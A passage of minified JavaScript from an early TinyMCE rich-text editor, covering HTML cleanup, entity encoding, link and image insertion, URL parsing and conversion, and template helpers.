$').test(str))str=str.substring(0,str.length-2);return str;};TinyMCE.prototype.convertRGBToHex=function(s){if(s.toLowerCase().indexOf('rgb')!=-1){var re=new RegExp("rgb\\s*\\(\\s*([0-9]+).*,\\s*([0-9]+).*,\\s*([0-9]+).*\\)","gi");var rgb=s.replace(re,"$1,$2,$3").split(',');if(rgb.length==3){r=parseInt(rgb[0]).toString(16);g=parseInt(rgb[1]).toString(16);b=parseInt(rgb[2]).toString(16);r=r.length==1?'0'+r:r;g=g.length==1?'0'+g:g;b=b.length==1?'0'+b:b;s="#"+r+g+b;}}return s;};TinyMCE.prototype._verifyClass=function(node){if(tinyMCE.isGecko){var className=node.getAttribute('class');if(!className)return false;}if(tinyMCE.isMSIE)var className=node.getAttribute('className');if(tinyMCE.cleanup_verify_css_classes&&tinyMCE.cleanup_on_save){var csses=tinyMCE.getCSSClasses();nonDefinedCSS=true;for(var c=0;c<csses.length;c++){if(csses[c]==className){nonDefinedCSS=false;break;}}if(nonDefinedCSS&&className.indexOf('mce_')!=0){node.removeAttribute('className');node.removeAttribute('class');return false;}}return true;};TinyMCE.prototype.cleanupNode=function(node){var output="";switch(node.nodeType){case 1:var elementData=tinyMCE._cleanupElementName(node.nodeName,node);var elementName=elementData?elementData.element_name:null;var elementValidAttribs=elementData?elementData.valid_attribs:null;var elementAttribs="";var openTag=false,nonEmptyTag=false;if(elementName!=null&&elementName.charAt(0)=='+'){elementName=elementName.substring(1);openTag=true;}if(elementName!=null&&elementName.charAt(0)=='-'){elementName=elementName.substring(1);nonEmptyTag=true;}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var lookup=tinyMCE.cleanup_elementLookupTable;for(var i=0;i<lookup.length;i++){if(lookup[i]==node)return output;}lookup[lookup.length]=node;}if(!elementName){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return output;}if(tinyMCE.cleanup_on_save){if(node.nodeName=="A"&&node.className=="mceItemAnchor"){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return '<a name="'+this.convertStringToXML(node.getAttribute("name"))+'"></a>'+output;}}var re=new RegExp("^(TABLE|TD|TR)$");if(re.test(node.nodeName)){if((node.nodeName!="TABLE"||tinyMCE.cleanup_inline_styles)&&(width=tinyMCE.getAttrib(node,"width"))!=''){node.style.width=width.indexOf('%')!=-1?width:width.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("width");}if((node.nodeName=="TABLE"&&!tinyMCE.cleanup_inline_styles)&&node.style.width!=''){tinyMCE.setAttrib(node,"width",node.style.width.replace('px',''));node.style.width='';}if((height=tinyMCE.getAttrib(node,"height"))!=''){node.style.height=height.indexOf('%')!=-1?height:height.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("height");}}if(tinyMCE.cleanup_inline_styles){var re=new RegExp("^(TABLE|TD|TR|IMG|HR)$");if(re.test(node.nodeName)){tinyMCE._moveStyle(node,'width','width');tinyMCE._moveStyle(node,'height','height');tinyMCE._moveStyle(node,'borderWidth','border');tinyMCE._moveStyle(node,'','vspace');tinyMCE._moveStyle(node,'','hspace');tinyMCE._moveStyle(node,'textAlign','align');tinyMCE._moveStyle(node,'backgroundColor','bgColor');tinyMCE._moveStyle(node,'borderColor','borderColor');tinyMCE._moveStyle(node,'backgroundImage','background');if(tinyMCE.isMSIE5)node.outerHTML=node.outerHTML;}else if(tinyMCE.isBlockElement(node))tinyMCE._moveStyle(node,'textAlign','align');if(node.nodeName=="FONT")tinyMCE._moveStyle(node,'color','color');}if(elementValidAttribs){for(var a=1;a<elementValidAttribs.length;a++){var attribName,attribDefaultValue,attribForceValue,attribValue;attribName=elementValidAttribs[a][0];attribDefaultValue=elementValidAttribs[a][1];attribForceValue=elementValidAttribs[a][2];if(attribDefaultValue!=null||attribForceValue!=null){var attribValue=node.getAttribute(attribName);if(node.getAttribute(attribName)==null||node.getAttribute(attribName)=="")attribValue=attribDefaultValue;attribValue=attribForceValue?attribForceValue:attribValue;if(attribValue=="{$uid}")attribValue="uid_"+(tinyMCE.cleanup_idCount++);if(attribName=="class")attribValue=tinyMCE.getVisualAidClass(attribValue,tinyMCE.cleanup_on_save);node.setAttribute(attribName,attribValue);}}}if((tinyMCE.isMSIE&&!tinyMCE.isOpera)&&elementName=="style")return "<style>"+node.innerHTML+"</style>";if(elementName=="table"&&!node.hasChildNodes())return "";if(node.attributes.length>0){var lastAttrib="";for(var i=0;i<node.attributes.length;i++){if(node.attributes[i].specified){if(tinyMCE.isOpera){if(node.attributes[i].nodeName==lastAttrib)continue;lastAttrib=node.attributes[i].nodeName;}var attrib=tinyMCE._cleanupAttribute(elementValidAttribs,elementName,node.attributes[i],node);if(attrib&&attrib.value!="")elementAttribs+=" "+attrib.name+"="+'"'+this.convertStringToXML(""+attrib.value)+'"';}}}if(tinyMCE.isMSIE&&elementName=="table"&&node.getAttribute("summary")!=null&&elementAttribs.indexOf('summary')==-1){var summary=tinyMCE.getAttrib(node,'summary');if(summary!='')elementAttribs+=" summary="+'"'+this.convertStringToXML(summary)+'"';}if(tinyMCE.isMSIE5&&/^(td|img|a)$/.test(elementName)){var ma=new Array("scope","longdesc","hreflang","charset","type");for(var u=0;u<ma.length;u++){if(node.getAttribute(ma[u])!=null){var s=tinyMCE.getAttrib(node,ma[u]);if(s!='')elementAttribs+=" "+ma[u]+"="+'"'+this.convertStringToXML(s)+'"';}}}if(tinyMCE.isMSIE&&elementName=="input"){if(node.type){if(!elementAttribs.match(/type=/g))elementAttribs+=" type="+'"'+node.type+'"';}if(node.value){if(!elementAttribs.match(/value=/g))elementAttribs+=" value="+'"'+node.value+'"';}}if((elementName=="p"||elementName=="td")&&(node.innerHTML==""||node.innerHTML==" "))return "<"+elementName+elementAttribs+">"+this.convertStringToXML(String.fromCharCode(160))+"</"+elementName+">";if(tinyMCE.isMSIE&&elementName=="script")return "<"+elementName+elementAttribs+">"+node.text+"</"+elementName+">";if(node.hasChildNodes()){if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="<div"+elementAttribs+">";else output+="<"+elementName+elementAttribs+">";}for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="</div><br />";else output+="</"+elementName+">";}}else{if(!nonEmptyTag){if(openTag)output+="<"+elementName+elementAttribs+"></"+elementName+">";else output+="<"+elementName+elementAttribs+" />";}}return output;case 3:if(node.parentNode.nodeName=="SCRIPT"||node.parentNode.nodeName=="STYLE")return node.nodeValue;return this.convertStringToXML(node.nodeValue);case 8:return "<!--"+node.nodeValue+"-->";default:return "[UNKNOWN NODETYPE "+node.nodeType+"]";}};TinyMCE.prototype.convertStringToXML=function(html_data){var output="";for(var i=0;i<html_data.length;i++){var chr=html_data.charCodeAt(i);if(tinyMCE.settings['entity_encoding']=="numeric"){if(chr>127)output+='&#'+chr+";";else output+=String.fromCharCode(chr);continue;}if(tinyMCE.settings['entity_encoding']=="raw"){output+=String.fromCharCode(chr);continue;}if(typeof(tinyMCE.cleanup_entities["c"+chr])!='undefined'&&tinyMCE.cleanup_entities["c"+chr]!='')output+='&'+tinyMCE.cleanup_entities["c"+chr]+';';else output+=''+String.fromCharCode(chr);}return output;};TinyMCE.prototype._getCleanupElementName=function(chunk){var pos;if(chunk.charAt(0)=='+')chunk=chunk.substring(1);if(chunk.charAt(0)=='-')chunk=chunk.substring(1);if((pos=chunk.indexOf('/'))!=-1)chunk=chunk.substring(0,pos);if((pos=chunk.indexOf('['))!=-1)chunk=chunk.substring(0,pos);return chunk;};TinyMCE.prototype._initCleanup=function(){var validElements=tinyMCE.settings["valid_elements"];validElements=validElements.split(',');var extendedValidElements=tinyMCE.settings["extended_valid_elements"];extendedValidElements=extendedValidElements.split(',');for(var i=0;i<extendedValidElements.length;i++){var elementName=this._getCleanupElementName(extendedValidElements[i]);var skipAdd=false;for(var x=0;x<validElements.length;x++){if(this._getCleanupElementName(validElements[x])==elementName){validElements[x]=extendedValidElements[i];skipAdd=true;break;}}if(!skipAdd)validElements[validElements.length]=extendedValidElements[i];}for(var i=0;i<validElements.length;i++){var item=validElements[i];item=item.replace('[','|');item=item.replace(']','');var attribs=item.split('|');for(var x=0;x<attribs.length;x++)attribs[x]=attribs[x].toLowerCase();attribs[0]=attribs[0].split('/');for(var x=1;x<attribs.length;x++){var attribName=attribs[x];var attribDefault=null;var attribForce=null;var attribMustBe=null;if((pos=attribName.indexOf('='))!=-1){attribDefault=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf(':'))!=-1){attribForce=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf('<'))!=-1){attribMustBe=attribName.substring(pos+1).split('?');attribName=attribName.substring(0,pos);}attribs[x]=new Array(attribName,attribDefault,attribForce,attribMustBe);}validElements[i]=attribs;}var invalidElements=tinyMCE.settings['invalid_elements'].split(',');for(var i=0;i<invalidElements.length;i++)invalidElements[i]=invalidElements[i].toLowerCase();tinyMCE.settings['cleanup_validElements']=validElements;tinyMCE.settings['cleanup_invalidElements']=invalidElements;tinyMCE.settings['cleanup_entities']=new Array();var entities=tinyMCE.getParam('entities','',true,',');for(var i=0;i<entities.length;i+=2)tinyMCE.settings['cleanup_entities']['c'+entities[i]]=entities[i+1];};TinyMCE.prototype._cleanupHTML=function(inst,doc,config,element,visual,on_save){if(!tinyMCE.settings['cleanup'])return element.innerHTML;if(on_save&&tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertFontsToSpans(doc);tinyMCE._customCleanup(inst,on_save?"get_from_editor_dom":"insert_to_editor_dom",doc.body);tinyMCE.cleanup_validElements=tinyMCE.settings['cleanup_validElements'];tinyMCE.cleanup_entities=tinyMCE.settings['cleanup_entities'];tinyMCE.cleanup_invalidElements=tinyMCE.settings['cleanup_invalidElements'];tinyMCE.cleanup_verify_html=tinyMCE.settings['verify_html'];tinyMCE.cleanup_force_br_newlines=tinyMCE.settings['force_br_newlines'];tinyMCE.cleanup_urlconverter_callback=tinyMCE.settings['urlconverter_callback'];tinyMCE.cleanup_verify_css_classes=tinyMCE.settings['verify_css_classes'];tinyMCE.cleanup_visual_table_class=tinyMCE.settings['visual_table_class'];tinyMCE.cleanup_apply_source_formatting=tinyMCE.settings['apply_source_formatting'];tinyMCE.cleanup_inline_styles=tinyMCE.settings['inline_styles'];tinyMCE.cleanup_visual_aid=visual;tinyMCE.cleanup_on_save=on_save;tinyMCE.cleanup_idCount=0;tinyMCE.cleanup_elementLookupTable=new Array();var startTime=new Date().getTime();if(tinyMCE.isMSIE){var nodes=element.getElementsByTagName("hr");for(var i=0;i<nodes.length;i++){if(nodes[i].id=="null")nodes[i].removeAttribute("id");}tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<p>[ \n\r]*<hr.*>[ \n\r]*</p>','<hr />','gi'));tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<!([^-(DOCTYPE)]* )|<!/[^-]*>','','gi'));}var html=this.cleanupNode(element);if(tinyMCE.settings['debug'])tinyMCE.debug("Cleanup process executed in: "+(new Date().getTime()-startTime)+" ms.");html=tinyMCE.regexpReplace(html,'<p><hr /></p>','<hr />');html=tinyMCE.regexpReplace(html,'<p> </p><hr /><p> </p>','<hr />');html=tinyMCE.regexpReplace(html,'<td>\\s*<br />\\s*</td>','<td> </td>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s* \\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s* \\s*</p>','<p> </p>');html=html.replace(new RegExp('<a>(.*?)</a>','gi'),'$1');if(!tinyMCE.isMSIE)html=html.replace(new RegExp('<o:p _moz-userdefined="" />','g'),"");if(tinyMCE.settings['remove_linebreaks'])html=html.replace(new RegExp('\r|\n','g'),' ');if(tinyMCE.getParam('apply_source_formatting')){html=html.replace(new RegExp('<(p|div)([^>]*)>','g'),"\n<$1$2>\n");html=html.replace(new RegExp('<\/(p|div)([^>]*)>','g'),"\n</$1$2>\n");html=html.replace(new RegExp('<br />','g'),"<br />\n");}if(tinyMCE.settings['force_br_newlines']){var re=new RegExp('<p> </p>','g');html=html.replace(re,"<br />");}if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt']){var re=new RegExp('<>','g');html=html.replace(re,"");}html=tinyMCE._customCleanup(inst,on_save?"get_from_editor":"insert_to_editor",html);var chk=tinyMCE.regexpReplace(html,"[ \t\r\n]","").toLowerCase();if(chk=="<br/>"||chk=="<br>"||chk=="<p> </p>"||chk=="<p> </p>"||chk=="<p></p>")html="";if(tinyMCE.settings["preformatted"])return "<pre>"+html+"</pre>";return html;};TinyMCE.prototype.insertLink=function(href,target,title,onclick,style_class){tinyMCE.execCommand('mceBeginUndoLevel');if(this.selectedInstance&&this.selectedElement&&this.selectedElement.nodeName.toLowerCase()=="img"){var doc=this.selectedInstance.getDoc();var linkElement=tinyMCE.getParentElement(this.selectedElement,"a");var newLink=false;if(!linkElement){linkElement=doc.createElement("a");newLink=true;}href=eval(tinyMCE.settings['urlconverter_callback']+"(href, linkElement);");tinyMCE.setAttrib(linkElement,'href',href);tinyMCE.setAttrib(linkElement,'target',target);tinyMCE.setAttrib(linkElement,'title',title);tinyMCE.setAttrib(linkElement,'onclick',onclick);tinyMCE.setAttrib(linkElement,'class',style_class);if(newLink){linkElement.appendChild(this.selectedElement.cloneNode(true));this.selectedElement.parentNode.replaceChild(linkElement,this.selectedElement);}return;}if(!this.linkElement&&this.selectedInstance){if(tinyMCE.isSafari){tinyMCE.execCommand("mceInsertContent",false,'<a href="'+tinyMCE.uniqueURL+'">'+this.selectedInstance.getSelectedHTML()+'</a>');}else this.selectedInstance.contentDocument.execCommand("createlink",false,tinyMCE.uniqueURL);tinyMCE.linkElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);var elementArray=this.getElementsByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);for(var i=0;i<elementArray.length;i++){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, elementArray[i]);");tinyMCE.setAttrib(elementArray[i],'href',href);tinyMCE.setAttrib(elementArray[i],'mce_real_href',href);tinyMCE.setAttrib(elementArray[i],'target',target);tinyMCE.setAttrib(elementArray[i],'title',title);tinyMCE.setAttrib(elementArray[i],'onclick',onclick);tinyMCE.setAttrib(elementArray[i],'class',style_class);}tinyMCE.linkElement=elementArray[0];}if(this.linkElement){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, this.linkElement);");tinyMCE.setAttrib(this.linkElement,'href',href);tinyMCE.setAttrib(this.linkElement,'mce_real_href',href);tinyMCE.setAttrib(this.linkElement,'target',target);tinyMCE.setAttrib(this.linkElement,'title',title);tinyMCE.setAttrib(this.linkElement,'onclick',onclick);tinyMCE.setAttrib(this.linkElement,'class',style_class);}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.insertImage=function(src,alt,border,hspace,vspace,width,height,align,title,onmouseover,onmouseout){tinyMCE.execCommand('mceBeginUndoLevel');if(src=="")return;if(!this.imgElement&&tinyMCE.isSafari){var html="";html+='<img src="'+src+'" alt="'+alt+'"';html+=' border="'+border+'" hspace="'+hspace+'"';html+=' vspace="'+vspace+'" width="'+width+'"';html+=' height="'+height+'" align="'+align+'" title="'+title+'" onmouseover="'+onmouseover+'" onmouseout="'+onmouseout+'" />';tinyMCE.execCommand("mceInsertContent",false,html);}else{if(!this.imgElement&&this.selectedInstance){if(tinyMCE.isSafari)tinyMCE.execCommand("mceInsertContent",false,'<img src="'+tinyMCE.uniqueURL+'" />');else this.selectedInstance.contentDocument.execCommand("insertimage",false,tinyMCE.uniqueURL);tinyMCE.imgElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"img","src",tinyMCE.uniqueURL);}}if(this.imgElement){var needsRepaint=false;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, tinyMCE.imgElement);");if(onmouseover&&onmouseover!="")onmouseover="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, tinyMCE.imgElement);")+"';";if(onmouseout&&onmouseout!="")onmouseout="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, tinyMCE.imgElement);")+"';";if(typeof(title)=="undefined")title=alt;if(width!=this.imgElement.getAttribute("width")||height!=this.imgElement.getAttribute("height")||align!=this.imgElement.getAttribute("align"))needsRepaint=true;tinyMCE.setAttrib(this.imgElement,'src',src);tinyMCE.setAttrib(this.imgElement,'mce_real_src',src);tinyMCE.setAttrib(this.imgElement,'alt',alt);tinyMCE.setAttrib(this.imgElement,'title',title);tinyMCE.setAttrib(this.imgElement,'align',align);tinyMCE.setAttrib(this.imgElement,'border',border,true);tinyMCE.setAttrib(this.imgElement,'hspace',hspace,true);tinyMCE.setAttrib(this.imgElement,'vspace',vspace,true);tinyMCE.setAttrib(this.imgElement,'width',width,true);tinyMCE.setAttrib(this.imgElement,'height',height,true);tinyMCE.setAttrib(this.imgElement,'onmouseover',onmouseover);tinyMCE.setAttrib(this.imgElement,'onmouseout',onmouseout);if(width&&width!="")this.imgElement.style.pixelWidth=width;if(height&&height!="")this.imgElement.style.pixelHeight=height;if(needsRepaint)tinyMCE.selectedInstance.repaint();}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.getElementByAttributeValue=function(node,element_name,attrib,value){var elements=this.getElementsByAttributeValue(node,element_name,attrib,value);if(elements.length==0)return null;return elements[0];};TinyMCE.prototype.getElementsByAttributeValue=function(node,element_name,attrib,value){var elements=new Array();if(node&&node.nodeName.toLowerCase()==element_name){if(node.getAttribute(attrib)&&node.getAttribute(attrib).indexOf(value)!=-1)elements[elements.length]=node;}if(node&&node.hasChildNodes()){for(var x=0,n=node.childNodes.length;x<n;x++){var childElements=this.getElementsByAttributeValue(node.childNodes[x],element_name,attrib,value);for(var i=0,m=childElements.length;i<m;i++)elements[elements.length]=childElements[i];}}return elements;};TinyMCE.prototype.isBlockElement=function(node){return node!=null&&node.nodeType==1&&this.blockRegExp.test(node.nodeName);};TinyMCE.prototype.getParentBlockElement=function(node){while(node){if(this.blockRegExp.test(node.nodeName))return node;node=node.parentNode;}return null;};TinyMCE.prototype.getNodeTree=function(node,node_array,type,node_name){if(typeof(type)=="undefined"||node.nodeType==type&&(typeof(node_name)=="undefined"||node.nodeName==node_name))node_array[node_array.length]=node;if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)tinyMCE.getNodeTree(node.childNodes[i],node_array,type,node_name);}return node_array;};TinyMCE.prototype.getParentElement=function(node,names,attrib_name,attrib_value){if(typeof(names)=="undefined"){if(node.nodeType==1)return node;while((node=node.parentNode)!=null&&node.nodeType!=1);return node;}var namesAr=names.split(',');if(node==null)return null;do{for(var i=0;i<namesAr.length;i++){if(node.nodeName.toLowerCase()==namesAr[i].toLowerCase()||names=="*"){if(typeof(attrib_name)=="undefined")return node;else if(node.getAttribute(attrib_name)){if(typeof(attrib_value)=="undefined"){if(node.getAttribute(attrib_name)!="")return node;}else if(node.getAttribute(attrib_name)==attrib_value)return node;}}}}while((node=node.parentNode)!=null);return null;};TinyMCE.prototype.convertURL=function(url,node,on_save){var prot=document.location.protocol;var host=document.location.hostname;var port=document.location.port;var fileProto=(prot=="file:");url=tinyMCE.regexpReplace(url,'(http|https):///','/');if(url.indexOf('mailto:')!=-1||url.indexOf('javascript:')!=-1||tinyMCE.regexpReplace(url,'[ \t\r\n\+]|%20','').charAt(0)=="#")return url;if(!tinyMCE.isMSIE&&!on_save&&url.indexOf("://")==-1&&url.charAt(0)!='/')return tinyMCE.settings['base_href']+url;if(!tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var baseUrlParts=tinyMCE.parseURL(tinyMCE.settings['base_href']);if(urlParts['anchor']&&urlParts['path']==baseUrlParts['path'])return "#"+urlParts['anchor'];}if(on_save&&tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var tmpUrlParts=tinyMCE.parseURL(tinyMCE.settings['document_base_url']);if(urlParts['host']==tmpUrlParts['host']&&(!urlParts['port']||urlParts['port']==tmpUrlParts['port']))return tinyMCE.convertAbsoluteURLToRelativeURL(tinyMCE.settings['document_base_url'],url);}if(!fileProto&&tinyMCE.getParam('remove_script_host')){var start="",portPart="";if(port!="")portPart=":"+port;start=prot+"//"+host+portPart+"/";if(url.indexOf(start)==0)url=url.substring(start.length-1);if(!tinyMCE.getParam('relative_urls')&&url.indexOf('://')==-1&&url.charAt(0)!='/')url='/'+url;}return url;};TinyMCE.prototype.parseURL=function(url_str){var urlParts=new Array();if(url_str){var pos,lastPos;pos=url_str.indexOf('://');if(pos!=-1){urlParts['protocol']=url_str.substring(0,pos);lastPos=pos+3;}for(var i=lastPos;i<url_str.length;i++){var chr=url_str.charAt(i);if(chr==':')break;if(chr=='/')break;}pos=i;urlParts['host']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)==':'){pos=url_str.indexOf('/',lastPos);urlParts['port']=url_str.substring(lastPos+1,pos);}lastPos=pos;pos=url_str.indexOf('?',lastPos);if(pos==-1)pos=url_str.indexOf('#',lastPos);if(pos==-1)pos=url_str.length;urlParts['path']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)=='?'){pos=url_str.indexOf('#');pos=(pos==-1)?url_str.length:pos;urlParts['query']=url_str.substring(lastPos+1,pos);}lastPos=pos;if(url_str.charAt(pos)=='#'){pos=url_str.length;urlParts['anchor']=url_str.substring(lastPos+1,pos);}}return urlParts;};TinyMCE.prototype.serializeURL=function(up){var url="";if(up['protocol'])url+=up['protocol']+"://";if(up['host'])url+=up['host'];if(up['port'])url+=":"+up['port'];if(up['path'])url+=up['path'];if(up['query'])url+="?"+up['query'];if(up['anchor'])url+="#"+up['anchor'];return url;};TinyMCE.prototype.convertAbsoluteURLToRelativeURL=function(base_url,url_to_relative){var baseURL=this.parseURL(base_url);var targetURL=this.parseURL(url_to_relative);var strTok1;var strTok2;var breakPoint=0;var outPath="";var forceSlash=false;if(targetURL.path=="")targetURL.path="/";else forceSlash=true;base_url=baseURL.path.substring(0,baseURL.path.lastIndexOf('/'));strTok1=base_url.split('/');strTok2=targetURL.path.split('/');if(strTok1.length>=strTok2.length){for(var i=0;i<strTok1.length;i++){if(i>=strTok2.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(strTok1.length<strTok2.length){for(var i=0;i<strTok2.length;i++){if(i>=strTok1.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(breakPoint==1)return targetURL.path;for(var i=0;i<(strTok1.length-(breakPoint-1));i++)outPath+="../";for(var i=breakPoint-1;i<strTok2.length;i++){if(i!=(breakPoint-1))outPath+="/"+strTok2[i];else outPath+=strTok2[i];}targetURL.protocol=null;targetURL.host=null;targetURL.port=null;targetURL.path=outPath==""&&forceSlash?"/":outPath;return this.serializeURL(targetURL);};TinyMCE.prototype.convertRelativeToAbsoluteURL=function(base_url,relative_url){var baseURL=TinyMCE.prototype.parseURL(base_url);var relURL=TinyMCE.prototype.parseURL(relative_url);if(relative_url==""||relative_url.charAt(0)=='/'||relative_url.indexOf('://')!=-1||relative_url.indexOf('mailto:')!=-1||relative_url.indexOf('javascript:')!=-1)return relative_url;baseURLParts=baseURL['path'].split('/');relURLParts=relURL['path'].split('/');var newBaseURLParts=new Array();for(var i=baseURLParts.length-1;i>=0;i--){if(baseURLParts[i].length==0)continue;newBaseURLParts[newBaseURLParts.length]=baseURLParts[i];}baseURLParts=newBaseURLParts.reverse();var newRelURLParts=new Array();var numBack=0;for(var i=relURLParts.length-1;i>=0;i--){if(relURLParts[i].length==0||relURLParts[i]==".")continue;if(relURLParts[i]=='..'){numBack++;continue;}if(numBack>0){numBack--;continue;}newRelURLParts[newRelURLParts.length]=relURLParts[i];}relURLParts=newRelURLParts.reverse();var len=baseURLParts.length-numBack;var absPath=(len<=0?"":"/")+baseURLParts.slice(0,len).join('/')+"/"+relURLParts.join('/');var start="",end="";relURL.protocol=baseURL.protocol;relURL.host=baseURL.host;relURL.port=baseURL.port;if(relURL.path.charAt(relURL.path.length-1)=="/")absPath+="/";relURL.path=absPath;return TinyMCE.prototype.serializeURL(relURL);};TinyMCE.prototype.getParam=function(name,default_value,strip_whitespace,split_chr){var value=(typeof(this.settings[name])=="undefined")?default_value:this.settings[name];if(value=="true"||value=="false")return(value=="true");if(strip_whitespace)value=tinyMCE.regexpReplace(value,"[ \t\r\n]","");if(typeof(split_chr)!="undefined"&&split_chr!=null){value=value.split(split_chr);var outArray=new Array();for(var i=0;i<value.length;i++){if(value[i]&&value[i]!="")outArray[outArray.length]=value[i];}value=outArray;}return value;};TinyMCE.prototype.getLang=function(name,default_value,parse_entities){var value=(typeof(tinyMCELang[name])=="undefined")?default_value:tinyMCELang[name];if(parse_entities){var el=document.createElement("div");el.innerHTML=value;value=el.innerHTML;}return value;};TinyMCE.prototype.addToLang=function(prefix,ar){for(var key in ar){if(typeof(ar[key])=='function')continue;tinyMCELang[(key.indexOf('lang_')==-1?'lang_':'')+(prefix!=''?(prefix+"_"):'')+key]=ar[key];}};TinyMCE.prototype.replaceVar=function(replace_haystack,replace_var,replace_str){var re=new RegExp('{\\\$'+replace_var+'}','g');return replace_haystack.replace(re,replace_str);};TinyMCE.prototype.replaceVars=function(replace_haystack,replace_vars){for(var key in replace_vars){var value=replace_vars[key];if(typeof(value)=='function')continue;replace_haystack=tinyMCE.replaceVar(replace_haystack,key,value);}return replace_haystack;};TinyMCE.prototype.triggerNodeChange=function(focus,setup_content){if(tinyMCE.settings['handleNodeChangeCallback']){if(tinyMCE.selectedInstance){var inst=tinyMCE.selectedInstance;var editorId=inst.editorId;var elm=(typeof(setup_content)!="undefined"&&setup_content)?tinyMCE.selectedElement:inst.getFocusElement();var undoIndex=-1;var undoLevels=-1;var anySelection=false;var selectedText=inst.getSelectedText();if(tinyMCE.settings["auto_resize"]){var doc=inst.getDoc();inst.iframeElement.style.width=doc.body.offsetWidth+"px";inst.iframeElement.style.height=doc.body.offsetHeight+"px";}if(tinyMCE.selectedElement)anySelection=(tinyMCE.selectedElement.nodeName.toLowerCase()=="img")||(selectedText&&selectedText.length>0);if(tinyMCE.settings['custom_undo_redo']){undoIndex=inst.undoIndex;undoLevels=inst.undoLevels.length;}tinyMCE.executeCallback('handleNodeChangeCallback','_handleNodeChange',0,editorId,elm,undoIndex,undoLevels,inst.visualAid,anySelection,setup_content);}}if(this.selectedInstance&&(typeof(focus)=="undefined"||focus))this.selectedInstance.contentWindow.focus();};TinyMCE.prototype._customCleanup=function(inst,type,content){var customCleanup=tinyMCE.settings['cleanup_callback'];if(customCleanup!=""&&eval("typeof("+customCleanup+")")!="undefined")content=eval(customCleanup+"(type, content, inst);");var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){if(eval("typeof(TinyMCE_"+plugins[i]+"_cleanup)")!="undefined")content=eval("TinyMCE_"+plugins[i]+"_cleanup(type, content, inst);");}return content;};TinyMCE.prototype.getContent=function(editor_id){if(typeof(editor_id)!="undefined")tinyMCE.selectedInstance=tinyMCE.getInstanceById(editor_id);if(tinyMCE.selectedInstance){var old=this.selectedInstance.getBody().innerHTML;var html=tinyMCE._cleanupHTML(this.selectedInstance,this.selectedInstance.getDoc(),tinyMCE.settings,this.selectedInstance.getBody(),false,true);tinyMCE.setInnerHTML(this.selectedInstance.getBody(),old);return html;}return null;};TinyMCE.prototype.setContent=function(html_content){if(tinyMCE.selectedInstance){tinyMCE.selectedInstance.execCommand('mceSetContent',false,html_content);tinyMCE.selectedInstance.repaint();}};TinyMCE.prototype.importThemeLanguagePack=function(name){if(typeof(name)=="undefined")name=tinyMCE.settings['theme'];tinyMCE.loadScript(tinyMCE.baseURL+'/themes/'+name+'/langs/'+tinyMCE.settings['language']+'.js');};TinyMCE.prototype.importPluginLanguagePack=function(name,valid_languages){var lang="en";valid_languages=valid_languages.split(',');for(var i=0;i<valid_languages.length;i++){if(tinyMCE.settings['language']==valid_languages[i])lang=tinyMCE.settings['language'];}tinyMCE.loadScript(tinyMCE.baseURL+'/plugins/'+name+'/langs/'+lang+'.js');};TinyMCE.prototype.applyTemplate=function(html,args){html=tinyMCE.replaceVar(html,"themeurl",tinyMCE.themeURL);if(typeof(args)!="undefined")html=tinyMCE.replaceVars(html,args);html=tinyMCE.replaceVars(html,tinyMCE.settings);html=tinyMCE.replaceVars(html,tinyMCELang);return html;};TinyMCE.prototype.openWindow=function(template,args){var html,width,height,x,y,resizable,scrollbars,url;args['mce_template_file']=template['file'];args['mce_width']=template['width'];args['mce_height']=template['height'];tinyMCE.windowArgs=args;html=template['html'];if(!(width=parseInt(template['width'])))width=320;if(!(height=parseInt(template['height'])))height=200;if(tinyMCE.isMSIE)height+=40;else 